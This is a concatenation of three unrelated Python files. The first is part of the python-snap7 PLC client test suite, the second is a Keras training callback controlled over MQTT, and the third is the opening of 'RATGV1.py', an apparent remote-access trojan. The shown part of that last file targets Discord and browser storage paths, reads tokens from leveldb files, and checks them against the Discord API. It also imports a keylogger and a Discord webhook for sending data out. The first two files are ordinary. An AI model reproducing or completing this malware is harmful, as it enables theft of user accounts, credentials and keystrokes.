filler = 31
expected = bytearray(filler.to_bytes(1, byteorder='big') * 100)
response = self.client.db_fill(1, filler)
result = self.client.wait_as_completion(500)
self.assertEqual(expected, self.client.db_read(1, 0, 100))
def test_as_db_get(self):
_buffer = buffer_type()
size = ctypes.c_int(buffer_size)
self.client.as_db_get(db_number, _buffer, size)
self.client.wait_as_completion(500)
result = bytearray(_buffer)[:size.value]
self.assertEqual(100, len(result))
def test_as_db_read(self):
size = 40
start = 0
db = 1
expected = bytearray(40)
self.client.db_write(db_number=db, start=start, data=expected)
wordlen = WordLen.Byte
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
data = (type_ * size)()
self.client.as_db_read(db, start, size, data)
self.client.wait_as_completion(500)
self.assertEqual(data, expected)
def test_as_db_write(self):
size = 40
data = bytearray(size)
wordlen = WordLen.Byte
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
size = len(data)
result = (type_ * size).from_buffer_copy(data)
self.client.as_db_write(db_number=1, start=0, size=size, data=result)
self.client.wait_as_completion(500)
self.assertEqual(data, result)
@unittest.skip("TODO: not yet fully implemented")
def test_as_download(self):
data = bytearray(128)
self.client.as_download(block_num=-1, data=data)
def test_plc_stop(self):
self.client.plc_stop()
def test_plc_hot_start(self):
self.client.plc_hot_start()
def test_plc_cold_start(self):
self.client.plc_cold_start()
def test_get_pdu_length(self):
pduRequested = self.client.get_param(10)
pduSize = self.client.get_pdu_length()
self.assertEqual(pduSize, pduRequested)
def test_get_cpu_info(self):
expected = (
('ModuleTypeName', 'CPU 315-2 PN/DP'),
('SerialNumber', 'S C-C2UR28922012'),
('ASName', 'SNAP7-SERVER'),
('Copyright', 'Original Siemens Equipment'),
('ModuleName', 'CPU 315-2 PN/DP')
)
cpuInfo = self.client.get_cpu_info()
for param, value in expected:
self.assertEqual(getattr(cpuInfo, param).decode('utf-8'), value)
def test_db_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client._library.Cli_DBWrite
self.client._library.Cli_DBWrite = mock_write
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.db_write(db_number=1, start=0, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_DBWrite = original
def test_download_with_byte_literal_does_not_throw(self):
mock_download = mock.MagicMock()
mock_download.return_value = None
original = self.client._library.Cli_Download
self.client._library.Cli_Download = mock_download
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.download(block_num=db_number, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_Download = original
def test_write_area_with_byte_literal_does_not_throw(self):
mock_writearea = mock.MagicMock()
mock_writearea.return_value = None
original = self.client._library.Cli_WriteArea
self.client._library.Cli_WriteArea = mock_writearea
area = Areas.DB
dbnumber = 1
size = 4
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.write_area(area, dbnumber, start, bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_WriteArea = original
def test_ab_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client._library.Cli_ABWrite
self.client._library.Cli_ABWrite = mock_write
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.ab_write(start=start, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_ABWrite = original
@unittest.skip("TODO: not yet fully implemented")
def test_as_ab_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client._library.Cli_AsABWrite
self.client._library.Cli_AsABWrite = mock_write
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.as_ab_write(start=start, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_AsABWrite = original
@unittest.skip("TODO: not yet fully implemented")
def test_as_db_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client._library.Cli_AsDBWrite
self.client._library.Cli_AsDBWrite = mock_write
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.db_write(db_number=1, start=0, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_AsDBWrite = original
@unittest.skip("TODO: not yet fully implemented")
def test_as_download_with_byte_literal_does_not_throw(self):
mock_download = mock.MagicMock()
mock_download.return_value = None
original = self.client._library.Cli_AsDownload
self.client._library.Cli_AsDownload = mock_download
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.as_download(block_num=db_number, data=bytearray(data))
except TypeError as e:
self.fail(str(e))
finally:
self.client._library.Cli_AsDownload = original
def test_get_plc_time(self):
self.assertAlmostEqual(datetime.now().replace(microsecond=0), self.client.get_plc_datetime(), delta=timedelta(seconds=1))
def test_set_plc_datetime(self):
new_dt = datetime(2011, 1, 1, 1, 1, 1, 0)
self.client.set_plc_datetime(new_dt)
        # Can't actually set the datetime in the emulated PLC; get_plc_datetime always returns the system time.
# self.assertEqual(new_dt, self.client.get_plc_datetime())
def test_wait_as_completion_pass(self, timeout=1000):
# Cli_WaitAsCompletion
# prepare Server with values
area = Areas.DB
dbnumber = 1
size = 1
start = 1
data = bytearray(size)
self.client.write_area(area, dbnumber, start, data)
# start as_request and test
wordlen, usrdata = self.client._prepare_as_read_area(area, size)
pusrdata = ctypes.byref(usrdata)
res = self.client.as_read_area(area, dbnumber, start, size, wordlen, pusrdata)
self.client.wait_as_completion(timeout)
self.assertEqual(bytearray(usrdata), data)
def test_wait_as_completion_timeouted(self, timeout=0, tries=500):
# Cli_WaitAsCompletion
# prepare Server
area = Areas.DB
dbnumber = 1
size = 1
start = 1
data = bytearray(size)
wordlen, data = self.client._prepare_as_read_area(area, size)
pdata = ctypes.byref(data)
self.client.write_area(area, dbnumber, start, bytearray(data))
# start as_request and wait for zero seconds to try trigger timeout
for i in range(tries):
res = self.client.as_read_area(area, dbnumber, start, size, wordlen, pdata)
res2 = None
try:
res2 = self.client.wait_as_completion(timeout)
check_error(res2)
except Snap7Exception as s7_err:
if not s7_err.args[0] == b'CLI : Job Timeout':
self.fail(f"While waiting another error appeared: {s7_err}")
return
except BaseException:
self.fail(f"While waiting another error appeared:>>>>>>>> {res2}")
self.fail(f"After {tries} tries, no timout could be envoked by snap7. Either tests are passing to fast or"
f"a problem is existing in the method. Fail test.")
def test_check_as_completion(self, timeout=5):
# Cli_CheckAsCompletion
check_status = ctypes.c_int(-1)
pending_checked = False
# preparing Server values
data = bytearray(b'\x01\xFF')
size = len(data)
area = Areas.DB
db = 1
start = 1
self.client.write_area(area, db, start, data)
# start as_request and test
wordlen, cdata = self.client._prepare_as_read_area(area, size)
pcdata = ctypes.byref(cdata)
res = self.client.as_read_area(area, db, start, size, wordlen, pcdata)
for i in range(10):
self.client.check_as_completion(ctypes.byref(check_status))
if check_status.value == 0:
self.assertEqual(data, bytearray(cdata))
break
pending_checked = True
time.sleep(1)
else:
self.fail(f"TimeoutError - Process pends for more than {timeout} seconds")
if pending_checked is False:
            logging.warning("Pending was never reached because the server was too fast,"
                            " but the request to the server was successful.")
def test_as_read_area(self):
amount = 1
start = 1
# Test read_area with a DB
area = Areas.DB
dbnumber = 1
data = bytearray(b'\x11')
self.client.write_area(area, dbnumber, start, data)
wordlen, usrdata = self.client._prepare_as_read_area(area, amount)
pusrdata = ctypes.byref(usrdata)
res = self.client.as_read_area(area, dbnumber, start, amount, wordlen, pusrdata)
self.client.wait_as_completion(1000)
self.assertEqual(bytearray(usrdata), data)
# Test read_area with a TM
area = Areas.TM
dbnumber = 0
data = bytearray(b'\x12\x34')
self.client.write_area(area, dbnumber, start, data)
wordlen, usrdata = self.client._prepare_as_read_area(area, amount)
pusrdata = ctypes.byref(usrdata)
res = self.client.as_read_area(area, dbnumber, start, amount, wordlen, pusrdata)
self.client.wait_as_completion(1000)
self.assertEqual(bytearray(usrdata), data)
# Test read_area with a CT
area = Areas.CT
dbnumber = 0
data = bytearray(b'\x13\x35')
self.client.write_area(area, dbnumber, start, data)
wordlen, usrdata = self.client._prepare_as_read_area(area, amount)
pusrdata = ctypes.byref(usrdata)
res = self.client.as_read_area(area, dbnumber, start, amount, wordlen, pusrdata)
self.client.wait_as_completion(1000)
self.assertEqual(bytearray(usrdata), data)
def test_as_write_area(self):
# Test write area with a DB
area = Areas.DB
dbnumber = 1
size = 1
start = 1
data = bytearray(b'\x11')
wordlen, cdata = self.client._prepare_as_write_area(area, data)
res = self.client.as_write_area(area, dbnumber, start, size, wordlen, cdata)
self.client.wait_as_completion(1000)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(data, bytearray(res))
# Test write area with a TM
area = Areas.TM
dbnumber = 0
size = 2
timer = bytearray(b'\x12\x00')
wordlen, cdata = self.client._prepare_as_write_area(area, timer)
res = self.client.as_write_area(area, dbnumber, start, size, wordlen, cdata)
self.client.wait_as_completion(1000)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(timer, bytearray(res))
# Test write area with a CT
area = Areas.CT
dbnumber = 0
size = 2
timer = bytearray(b'\x13\x00')
wordlen, cdata = self.client._prepare_as_write_area(area, timer)
res = self.client.as_write_area(area, dbnumber, start, size, wordlen, cdata)
self.client.wait_as_completion(1000)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(timer, bytearray(res))
def test_as_eb_read(self):
# Cli_AsEBRead
wordlen = WordLen.Byte
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
buffer = (type_ * 1)()
response = self.client.as_eb_read(0, 1, buffer)
self.assertEqual(0, response)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_eb_write(self):
# Cli_AsEBWrite
response = self.client.as_eb_write(0, 1, bytearray(b'\x00'))
self.assertEqual(0, response)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_full_upload(self):
# Cli_AsFullUpload
response = self.client.as_full_upload('DB', 1)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_list_blocks_of_type(self):
data = (ctypes.c_uint16 * 10)()
count = ctypes.c_int()
self.client.as_list_blocks_of_type('DB', data, count)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_mb_read(self):
# Cli_AsMBRead
wordlen = WordLen.Byte
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
data = (type_ * 1)()
self.client.as_mb_read(0, 1, data)
result = bytearray(data)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_mb_write(self):
# Cli_AsMBWrite
response = self.client.as_mb_write(0, 1, bytearray(b'\x00'))
self.assertEqual(0, response)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
def test_as_read_szl(self):
# Cli_AsReadSZL
expected = b'S C-C2UR28922012\x00\x00\x00\x00\x00\x00\x00\x00'
ssl_id = 0x011c
index = 0x0005
s7_szl = S7SZL()
size = ctypes.c_int(ctypes.sizeof(s7_szl))
self.client.as_read_szl(ssl_id, index, s7_szl, size)
self.client.wait_as_completion(100)
result = bytes(s7_szl.Data)[2:26]
self.assertEqual(expected, result)
def test_as_read_szl_list(self):
# Cli_AsReadSZLList
expected = b'\x00\x00\x00\x0f\x02\x00\x11\x00\x11\x01\x11\x0f\x12\x00\x12\x01'
szl_list = S7SZLList()
items_count = ctypes.c_int(ctypes.sizeof(szl_list))
self.client.as_read_szl_list(szl_list, items_count)
self.client.wait_as_completion(500)
result = bytearray(szl_list.List)[:16]
self.assertEqual(expected, result)
def test_as_tm_read(self):
# Cli_AsMBRead
expected = b'\x10\x01'
wordlen = WordLen.Timer
self.client.tm_write(0, 1, bytearray(expected))
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
buffer = (type_ * 1)()
self.client.as_tm_read(0, 1, buffer)
self.client.wait_as_completion(500)
self.assertEqual(expected, bytearray(buffer))
def test_as_tm_write(self):
# Cli_AsMBWrite
data = b'\x10\x01'
response = self.client.as_tm_write(0, 1, bytearray(data))
result = self.client.wait_as_completion(500)
self.assertEqual(0, response)
self.assertEqual(0, result)
self.assertEqual(data, self.client.tm_read(0, 1))
def test_copy_ram_to_rom(self):
# Cli_CopyRamToRom
self.assertEqual(0, self.client.copy_ram_to_rom(timeout=1))
def test_ct_read(self):
# Cli_CTRead
data = b'\x10\x01'
self.client.ct_write(0, 1, bytearray(data))
result = self.client.ct_read(0, 1)
self.assertEqual(data, result)
def test_ct_write(self):
# Cli_CTWrite
data = b'\x01\x11'
self.assertEqual(0, self.client.ct_write(0, 1, bytearray(data)))
self.assertRaises(ValueError, self.client.ct_write, 0, 2, bytes(1))
def test_db_fill(self):
# Cli_DBFill
filler = 31
expected = bytearray(filler.to_bytes(1, byteorder='big') * 100)
self.client.db_fill(1, filler)
self.assertEqual(expected, self.client.db_read(1, 0, 100))
def test_eb_read(self):
# Cli_EBRead
self.client._library.Cli_EBRead = mock.Mock(return_value=0)
response = self.client.eb_read(0, 1)
self.assertTrue(isinstance(response, bytearray))
self.assertEqual(1, len(response))
def test_eb_write(self):
# Cli_EBWrite
self.client._library.Cli_EBWrite = mock.Mock(return_value=0)
response = self.client.eb_write(0, 1, bytearray(b'\x00'))
self.assertEqual(0, response)
def test_error_text(self):
# Cli_ErrorText
CPU_INVALID_PASSWORD = 0x01E00000
        CPU_INVALID_VALUE = 0x00D00000
CANNOT_CHANGE_PARAM = 0x02600000
self.assertEqual('CPU : Invalid password', self.client.error_text(CPU_INVALID_PASSWORD))
        self.assertEqual('CPU : Invalid value supplied', self.client.error_text(CPU_INVALID_VALUE))
self.assertEqual('CLI : Cannot change this param now', self.client.error_text(CANNOT_CHANGE_PARAM))
def test_get_cp_info(self):
# Cli_GetCpInfo
result = self.client.get_cp_info()
self.assertEqual(2048, result.MaxPduLength)
self.assertEqual(0, result.MaxConnections)
self.assertEqual(1024, result.MaxMpiRate)
self.assertEqual(0, result.MaxBusRate)
def test_get_exec_time(self):
# Cli_GetExecTime
response = self.client.get_exec_time()
self.assertTrue(isinstance(response, int))
def test_get_last_error(self):
# Cli_GetLastError
self.assertEqual(0, self.client.get_last_error())
def test_get_order_code(self):
# Cli_GetOrderCode
expected = b'6ES7 315-2EH14-0AB0 '
result = self.client.get_order_code()
self.assertEqual(expected, result.OrderCode)
def test_get_protection(self):
# Cli_GetProtection
result = self.client.get_protection()
self.assertEqual(1, result.sch_schal)
self.assertEqual(0, result.sch_par)
self.assertEqual(1, result.sch_rel)
self.assertEqual(2, result.bart_sch)
self.assertEqual(0, result.anl_sch)
def test_get_pg_block_info(self):
valid_db_block = b'pp\x01\x01\x05\n\x00c\x00\x00\x00t\x00\x00\x00\x00\x01\x8d\xbe)2\xa1\x01' \
b'\x85V\x1f2\xa1\x00*\x00\x00\x00\x00\x00\x02\x01\x0f\x05c\x00#\x00\x00\x00' \
b'\x11\x04\x10\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01' \
b'\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x00' \
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
b'\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
block_info = self.client.get_pg_block_info(bytearray(valid_db_block))
self.assertEqual(10, block_info.BlkType)
self.assertEqual(99, block_info.BlkNumber)
self.assertEqual(2752512, block_info.SBBLength)
self.assertEqual(bytes((util.utc2local(date(2019, 6, 27)).strftime("%Y/%m/%d")), encoding="utf-8"), block_info.CodeDate)
self.assertEqual(bytes((util.utc2local(date(2019, 6, 27)).strftime("%Y/%m/%d")), encoding="utf-8"), block_info.IntfDate)
def test_iso_exchange_buffer(self):
# Cli_IsoExchangeBuffer
self.client.db_write(1, 0, bytearray(b'\x11'))
# PDU read DB1 1.0 BYTE
data = b'\x32\x01\x00\x00\x01\x00\x00\x0e\x00\x00\x04\x01\x12\x0a\x10\x02\x00\x01\x00\x01\x84\x00\x00\x00'
# PDU response
expected = bytearray(b'2\x03\x00\x00\x01\x00\x00\x02\x00\x05\x00\x00\x04\x01\xff\x04\x00\x08\x11')
self.assertEqual(expected, self.client.iso_exchange_buffer(bytearray(data)))
def test_mb_read(self):
# Cli_MBRead
self.client._library.Cli_MBRead = mock.Mock(return_value=0)
response = self.client.mb_read(0, 10)
self.assertTrue(isinstance(response, bytearray))
self.assertEqual(10, len(response))
def test_mb_write(self):
# Cli_MBWrite
self.client._library.Cli_MBWrite = mock.Mock(return_value=0)
response = self.client.mb_write(0, 1, bytearray(b'\x00'))
self.assertEqual(0, response)
def test_read_szl(self):
# read_szl_partial_list
expected_number_of_records = 10
expected_length_of_record = 34
ssl_id = 0x001c
response = self.client.read_szl(ssl_id)
self.assertEqual(expected_number_of_records, response.Header.NDR)
self.assertEqual(expected_length_of_record, response.Header.LengthDR)
# read_szl_single_data_record
expected = b'S C-C2UR28922012\x00\x00\x00\x00\x00\x00\x00\x00'
ssl_id = 0x011c
index = 0x0005
response = self.client.read_szl(ssl_id, index)
result = bytes(response.Data)[2:26]
self.assertEqual(expected, result)
# read_szl_order_number
expected = b'6ES7 315-2EH14-0AB0 '
ssl_id = 0x0111
index = 0x0001
response = self.client.read_szl(ssl_id, index)
result = bytes(response.Data[2:22])
self.assertEqual(expected, result)
# read_szl_invalid_id
ssl_id = 0xffff
index = 0xffff
self.assertRaises(Snap7Exception, self.client.read_szl, ssl_id)
self.assertRaises(Snap7Exception, self.client.read_szl, ssl_id, index)
def test_read_szl_list(self):
# Cli_ReadSZLList
expected = b'\x00\x00\x00\x0f\x02\x00\x11\x00\x11\x01\x11\x0f\x12\x00\x12\x01'
result = self.client.read_szl_list()
self.assertEqual(expected, result[:16])
def test_set_plc_system_datetime(self):
# Cli_SetPlcSystemDateTime
self.assertEqual(0, self.client.set_plc_system_datetime())
def test_tm_read(self):
# Cli_TMRead
data = b'\x10\x01'
self.client.tm_write(0, 1, bytearray(data))
result = self.client.tm_read(0, 1)
self.assertEqual(data, result)
def test_tm_write(self):
# Cli_TMWrite
data = b'\x10\x01'
self.assertEqual(0, self.client.tm_write(0, 1, bytearray(data)))
self.assertEqual(data, self.client.tm_read(0, 1))
self.assertRaises(Snap7Exception, self.client.tm_write, 0, 100, bytes(200))
self.assertRaises(ValueError, self.client.tm_write, 0, 2, bytes(2))
def test_write_multi_vars(self):
# Cli_WriteMultiVars
items_count = 3
items = []
areas = [Areas.DB, Areas.CT, Areas.TM]
expected_list = []
for i in range(0, items_count):
item = S7DataItem()
item.Area = ctypes.c_int32(areas[i].value)
wordlen = WordLen.Byte
item.WordLen = ctypes.c_int32(wordlen.value)
item.DBNumber = ctypes.c_int32(1)
item.Start = ctypes.c_int32(0)
item.Amount = ctypes.c_int32(4)
data = (i + 1).to_bytes(1, byteorder='big') * 4
array_class = ctypes.c_uint8 * len(data)
cdata = array_class.from_buffer_copy(data)
item.pData = ctypes.cast(cdata, ctypes.POINTER(array_class)).contents
items.append(item)
expected_list.append(data)
result = self.client.write_multi_vars(items)
self.assertEqual(0, result)
self.assertEqual(expected_list[0], self.client.db_read(db_number=1, start=0, size=4))
self.assertEqual(expected_list[1], self.client.ct_read(0, 2))
self.assertEqual(expected_list[2], self.client.tm_read(0, 2))
@unittest.skipIf(platform.system() == 'Windows', 'Access Violation error')
def test_set_as_callback(self):
expected = b"\x11\x11"
self.callback_counter = 0
cObj = ctypes.cast(ctypes.pointer(ctypes.py_object(self)), S7Object)
def callback(FUsrPtr, JobOp, response):
self = ctypes.cast(FUsrPtr, ctypes.POINTER(ctypes.py_object)).contents.value
self.callback_counter += 1
cfunc_type = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.POINTER(S7Object), ctypes.c_int, ctypes.c_int)
self.client.set_as_callback(cfunc_type(callback), cObj)
self.client.as_ct_write(0, 1, bytearray(expected))
self._as_check_loop()
self.assertEqual(expected, self.client.ct_read(0, 1))
self.assertEqual(1, self.callback_counter)
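# --- Hypothetical usage sketch (not part of the test suite) ---
# Mirrors the connect/read/write calls exercised in TestClient against
# the emulated server started in setUpClass; the DB number and payload
# are illustrative only, and this helper is never invoked by the test runner.
def _example_db_round_trip():
    client = snap7.client.Client()
    client.connect(ip, rack, slot, tcpport)
    try:
        payload = bytearray(b'\x01\x02\x03\x04')
        client.db_write(db_number=1, start=0, data=payload)
        assert client.db_read(db_number=1, start=0, size=4) == payload
    finally:
        client.disconnect()
        client.destroy()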
class TestClientBeforeConnect(unittest.TestCase):
"""
Test suite of items that should run without an open connection.
"""
def setUp(self):
self.client = snap7.client.Client()
def test_set_param(self):
values = (
(snap7.types.RemotePort, 1102),
(snap7.types.PingTimeout, 800),
(snap7.types.SendTimeout, 15),
(snap7.types.RecvTimeout, 3500),
(snap7.types.SrcRef, 128),
(snap7.types.DstRef, 128),
(snap7.types.SrcTSap, 128),
(snap7.types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
class TestLibraryIntegration(unittest.TestCase):
def setUp(self):
# replace the function load_library with a mock
self.loadlib_patch = mock.patch('snap7.client.load_library')
self.loadlib_func = self.loadlib_patch.start()
# have load_library return another mock
self.mocklib = mock.MagicMock()
self.loadlib_func.return_value = self.mocklib
# have the Cli_Create of the mock return None
self.mocklib.Cli_Create.return_value = None
def tearDown(self):
# restore load_library
self.loadlib_patch.stop()
def test_create(self):
client = snap7.client.Client()
self.mocklib.Cli_Create.assert_called_once()
@mock.patch('snap7.client.byref')
def test_gc(self, byref_mock):
client = snap7.client.Client()
client._pointer = 10
del client
gc.collect()
self.mocklib.Cli_Destroy.assert_called_once()
if __name__ == '__main__':
unittest.main()
|
jukebox_backend.py
|
from tensorflow.keras.callbacks import Callback
from tensorflow.keras import backend as K
import threading, sys, json, os
import numpy as np
import paho.mqtt.client as mqtt
from PyQt5 import QtCore, QtGui, QtWidgets
from keras_jukebox.utils import red_print, green_print, yellow_print, cyan_print
class JukeBoxCallback(Callback):
def __init__(self, verbose=0, host='localhost', port=1883):
super(JukeBoxCallback, self).__init__()
self.verbose = verbose
self.PID = 199 #np.random.randint(0,100)
self.backend_learning_rate = 0
self.frontend_learning_rate = 0
self.frontend_learning_rate_prev = 0
self.host = host
self.port = port
self.client = mqtt.Client()
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.subscribe_topic = 'keras_JukeBox/backend/{}'.format(self.PID)
self.publish_topic = 'keras_JukeBox/frontend/{}'.format(self.PID)
self.msg = None
self.client.connect(host=self.host, port=self.port, keepalive=60, bind_address="")
self.start = False
#TODO make a PID checker
self.client.subscribe(self.subscribe_topic)
self.play_status = 'pause'
self.stopped_from_frontend = False
self.current_epoch = 0
self.current_batch = 0
self.update_learning_rate = False
payload = {'PID':self.PID, 'status': 'not_started'}
self.publish_data(payload)
self.running = False
green_print('called init function')
def start_listening(self):
self.running = True
while self.running:
self.client.loop(timeout=1.0, max_packets=1)
def on_connect(self, client, userdata, flags, rc):
cyan_print("Connected to {} with result code {}".format(self.host,rc))
#send a connection request
#payload = {'PID':self.PID, 'status': 'not_started'}
#self.publish_data(payload)
def publish_data(self, payload=None, qos=0, retain=True):
if isinstance(payload, dict):
payload = json.dumps(payload, indent=2)
self.client.publish(self.publish_topic, payload=payload, qos=qos, retain=retain)
        elif payload is None:
            self.client.publish(self.publish_topic, payload=payload, qos=1, retain=True)
            #red_print("cleared all messages under topic name {}".format(self.publish_topic))
else:
red_print("payload was not dictionary, did not send")
def on_message(self,client, userdata, msg):
message = json.loads(msg.payload.decode('utf-8'))
#print(message)
        if not self.start:
#connection has not been acknowledged
#message = json.loads(msg.payload.decode('utf-8'))
if message['status'] == 'acknowledged':
self.start = True
else:
red_print('did not understand msg::{}'.format(message))
else:
#self.subscribe_topic = msg.topic
self.msg = message
#red_print("got a message")
if self.verbose > 0:
cyan_print("Received a new command from JukeBox")
#cyan_print(self.subscribe_topic+" "+str(self.msg))
self.update_variables()
def update_variables(self):
tab_1_cmd = self.msg['tab1']
tab_2_cmd = self.msg['tab2']
if tab_1_cmd['play_status'] in ['play', 'pause', 'stop']:
self.play_status = tab_1_cmd['play_status']
self.frontend_learning_rate = tab_2_cmd['learning_rate']
else:
red_print("Play command '{}' in not supported so rejected whole message, retaining previous command '{}'".format(tab_1_cmd['play_status'],self.play_status))
if self.frontend_learning_rate != self.frontend_learning_rate_prev:
self.update_learning_rate = True
self.frontend_learning_rate_prev = self.frontend_learning_rate
#self.update_learning_rate = tab_2_cmd['update_learning_rate']
def on_train_begin(self, logs):
thr = threading.Thread(target=self.start_listening)
thr.daemon = True
thr.start()
if not hasattr(self.model.optimizer, 'lr'):
raise ValueError('Optimizer must have a "lr" attribute.')
green_print('waiting for a JukeBox')
while not self.start:
pass
green_print('connected to JukeBox')
self.backend_learning_rate = float(K.get_value(self.model.optimizer.lr))
# After connection is ack initialize this lr in GUI
def on_batch_begin(self, batch, logs=None):
self.current_batch = batch
# if play has not been initiated, go into an infinite loop
#run_status_displayed=False
if self.play_status in ['pause', 'stop']:
if self.play_status == 'pause':
yellow_print('paused from frontend')
if self.play_status == 'stop':
self.stopped_from_frontend = True
self.model.stop_training = True
while self.play_status =='pause':
# TO DO take a snapshot if hinted by frontend
if self.msg != None: # if self.msg==None, it means session is not yet acknowledged
if self.msg['tab3']['take_snapshot']:
self.take_a_snapshot()
pass
green_print('Resuming ..')
if not hasattr(self.model.optimizer, 'lr'):
raise ValueError('Optimizer must have a "lr" attribute.')
self.backend_learning_rate = float(K.get_value(self.model.optimizer.lr))
#lr = float(K.get_value(self.model.optimizer.lr))
#self.frontend_learning_rate is updated by on_message function
if not isinstance(self.frontend_learning_rate, (float, np.float32, np.float64)):
            raise ValueError('The learning rate received from the frontend '
                             'should be a float.')
#if self.backend_learning_rate != self.frontend_learning_rate:
if self.update_learning_rate:
if self.verbose > 0:
yellow_print('updated learning rate from {} to {}'.format(self.backend_learning_rate, self.frontend_learning_rate))
K.set_value(self.model.optimizer.lr, self.frontend_learning_rate)
self.update_learning_rate = False
# recapture this learning rate to send to FrontEnd
self.backend_learning_rate = float(K.get_value(self.model.optimizer.lr))
# send learning rate to frontend
#if self.verbose > 0:
# red_print('\nEpoch %05d: JukeBox reducing learning '
# 'rate to %s.' % (epoch + 1, lr))
def take_a_snapshot(self):
tab3_payload = self.msg['tab3']
folder_path = tab3_payload['checkpoint_path']
checkpoint_name = '{}_E{}_B{}'.format(tab3_payload['checkpoint_name'], self.current_epoch, self.current_batch)
filepath = os.path.join(folder_path, checkpoint_name) #generate snapshot from os.path.join(folder_path, checkpoint_name{epoch:02d})
if tab3_payload['h5']:
self.model.save(filepath+'.h5')
if tab3_payload['ckpt']:
self.model.save_weights(filepath+'.ckpt')
if self.verbose >0:
yellow_print("Took a snapshot at Epoch-{}, at batch-{}".format(self.current_epoch, self.current_batch))
# after taking a snapshot make it False
self.msg['tab3']['take_snapshot'] = False
def on_batch_end(self, batch, logs=None):
#check tab3_payload for taking a checkpoint
tab3_payload = self.msg['tab3']
#{'take_snapshot': True, 'h5':False, 'ckpt': False, 'checkpoint_name':checkpoint_name}
if tab3_payload['take_snapshot'] :
# write function to take snapshot here
self.take_a_snapshot()
payload = {'learning_rate':self.backend_learning_rate,
'epoch':self.current_epoch,
'batch':self.current_batch}
self.publish_data(payload)
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
logs['lr'] = K.get_value(self.model.optimizer.lr)
self.current_epoch = epoch+1
def on_train_end(self, logs):
if self.stopped_from_frontend:
red_print("training stopped from JukeBox")
else:
green_print("training complete, terminated naturally")
self.publish_data(payload=None)
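# --- Hypothetical usage sketch (not part of the original module) ---
# Illustrates how the callback is assumed to be attached to model.fit;
# the toy model, the training-data names and the broker address are
# placeholders. Note that on_train_begin blocks until a JukeBox frontend
# acknowledges the session over MQTT.
def _example_training_session(x_train, y_train):
    from tensorflow.keras import models, layers  # local import: sketch only
    model = models.Sequential([layers.Dense(1, input_shape=(4,))])
    model.compile(optimizer='adam', loss='mse')
    jukebox = JukeBoxCallback(verbose=1, host='localhost', port=1883)
    model.fit(x_train, y_train, epochs=10, callbacks=[jukebox])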
|
RATGV1.py
|
import os
if os.name != "nt":
exit()
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from codecs import encode
import getpass
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
from pathlib import Path
from discord_webhook import DiscordWebhook, DiscordEmbed
import requests
import random
import sys
from pynput.keyboard import Key, Listener
ext = {"webhook": "ChangeMe", "webhook-name": "ChangeMe"}
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
